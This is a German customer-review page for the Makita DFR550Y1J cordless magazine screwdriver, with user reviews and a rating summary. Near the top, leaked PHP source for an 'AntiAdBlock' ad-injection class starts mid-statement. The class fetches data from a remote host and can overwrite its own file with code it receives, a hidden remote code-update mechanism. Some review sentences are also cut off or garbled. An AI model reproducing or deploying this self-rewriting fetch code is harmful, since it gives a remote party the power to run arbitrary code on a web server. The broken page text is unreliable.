Makita Akku-Magazinschrauber – Einfach nur genial!

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2361347(); return $__aab->get();

Ich benutze den magazinschrauber nun seit ca. Einer woche bei uns im ausbau unseres einfamilienhauses. Sobald die korrekte länge am futter eingestellt ist, der gurt eingelegt wurde kann es losgehen. Einfach immer gedrückt halten und im 90 grad winkel durchdrücken. Ich hatte nie ladehemmungen o. Lediglich ein paar mal, als ich die maschine zu schräg angesetzt habe. Ansonsten läuft die maschine so wie sie soll.Würde ich jederzeit wieder kaufen.

Ich habe das set mit 1 x 1,5ah akku gekauft. ( dfr550y1j )da ich viele weitere makita 18v geräte habe waren grössere akkus schon vorhanden. Mit der 1,5 ah akku kann man auch arbeiten aber ein etwas grössere ( 3-4 ah ) macht es viel angenehmer. Nun zum “zickigkeit”ich könnte mit das gerät nicht einfach loslegen und alles war gut, es brauchte schon ein bisschen Übung bevor es richtig geflutscht hat. Anfangs dachte ich; da muss was kaputt sein. Aber nach einige “bänder” ging es dann sehr viel besser. Man muss gut und gerade ansetzen und auch darauf achten dass gute und für den untergrund passende schrauben geladen sind. Auch sollte wert darauf gelegt werden dass die laufrichtung richtig eingestellt ist. . Der knopf für den rückwärts lauf ist analog zu den normalen akkuschraubern von makita platziert und manchmal wird der unfreiwillig einfach gedrückt. Die schraubtiefeeinstellung ist bei mir bis jetzt immer auf maximal eingestellt gewesen damit die köpfe etwa 1-2mm tief sitzen.

Die investition hat sich gelohnt. Ich nutze es in meiner firma und meine jungs sind absolut begeistert. Schneller bedeutet mehr geld. Hier sind die Spezifikationen für die Makita Akku-Magazinschrauber:

  • Kompatibel mit 1,5 Ah, 3,0 Ah und 4,0 Ah Akkus
  • Zur schnellen Verarbeitung von gurtmagazinierten Schrauben

Top gerät, zu meinen beiden vorrednern:ich habe es zuerst auch nicht hinbekommen. Ich habe schrauben von drei verschiedenen herstellern ausprobiert, zum beispiel adunox und makita. Das problem liegt tatsächlich einzig und allein darin, dass der hahn der maschine permanent gedrückt werden muss. Und schon hat man keine verkantenden oder herunterfallenden schrauben mehr. Ich bin 100% mit der leistung zufrieden und absolut begeistert.

Ich habe bisher ca 4000 bis 5000 schrauben verbaut. Man muss sich das gerät vorher ansehen wie der bit auf den schraubenkopf kommt schrauber einschalten und wenn man da dem schrauben eine halbe sekunde nur zeit gibt zum hinein finden dann geht das total super. Man braucht aber einen guten akku sonst muss man ständig wechseln. Ein bit hält bei richtiger verwendung ca. Ständig falsche verwendung dann ca.

Kommentare von Käufern :

  • Einfach nur genial!
  • Sehr gut aber ein bisschen zickig
  • Trotz mancher negativ Kritik vollkommen in Ordnung,

Arbeite mit dem gerät jeden tag und bin damit sehr zufrieden. Meinem vorredner kann ich nicht hachvolziehen. Muss ein anwenderfehler sein wenn sich ständig die schraube verharkt. Warscheinlich zu kurz vor dem schrauben den taster betätigt oder fahlsche schraubenlänge eingestellt oder billige magazine verwendet. Langer rede kurzer sinn: top maschiene 5 sterne. Besten Makita Akku-Magazinschrauber (18 V, SystemKIT mit 1 Akku 1,5 Ah, ohne Ladegerät, im MAKPAC) DFR550Y1J

Der schrauber scheint etwas aus der form geraten, überzeugt aber durch einfache handhabung und schnelles wechseln. Hatte ihn jetzt 3 wochen im dauereinsatz ohne probleme. Auch das umstellen auf andere schraubenlängen erfolgt sehr einfach und ohne wekzeug.

Super gerät, weiß gar nicht, warum ich mit dem kauf so lange gewartet habe. . Auch der preis war voll in ordnung.

Ich habe jetzt auch den ersten größeren ausbau hintermir und bin ein wenig ambivalent. Der magazinschrauber war/ist eine top erleichterung bei der verarbeitung von “2mann-platten” wenn man alleine ist. Ich habe dennoch immer meinen schnellbauschrauber (älterer jahrgang/auch makita) dabei und den akkuschrauber sowieso. Einfache platten senkrecht stehend und platten an/unter der decke (liegen ja auf dem plattenheber) lassen sich echt super mit dem magazinschrauber verarbeiten. An schrägen wo man alleine “alle hände voll zu tun hat” die platte zu halten und dabei mit dem magazinschrauber versucht die platte zu fixieren ist es bei mir auch mehr als einmal vorgekommen, dass sich eine schraube verhagt hat und den ganzen schrauber blockiert. Das heißt also der magazinschrauber ist für die “straße nicht für das gelände” geeignet. Das heißt, wenn man den magazinschrauber “sauber” im rechten winkel aufsetzt läuft alles super. Da kommt es auch nicht auf die geschwindigkeit an. Wenn der winkel (wie der magazinschrauber auf der platte sitzt) passt (der lässt wirklich nur wenig spielraum zu 90grad zu) kann ich damit schneller als im sekundentakt schrauben versenken.

Wir bauen gerade den dachboden aus und dachten uns in eine top marke zu investieren. Ständig verhaken sich die schrauben was die arbeit nicht gerade leichter macht. Man ist fast froh wenn das gerät mal wieder 6 schrauben am stück geschafft hat. Aber die nächste ist mit sicherheit so weit draußen um sie mit dem akkuschrauber nachziehen zu müssen oder verhakt sich.

Summary
Review Date
Reviewed Item
Makita Akku-Magazinschrauber (18 V, SystemKIT mit 1 Akku 1,5 Ah, ohne Ladegerät, im MAKPAC) DFR550Y1J
Rating
3,0 of 5 stars, based on 10 reviews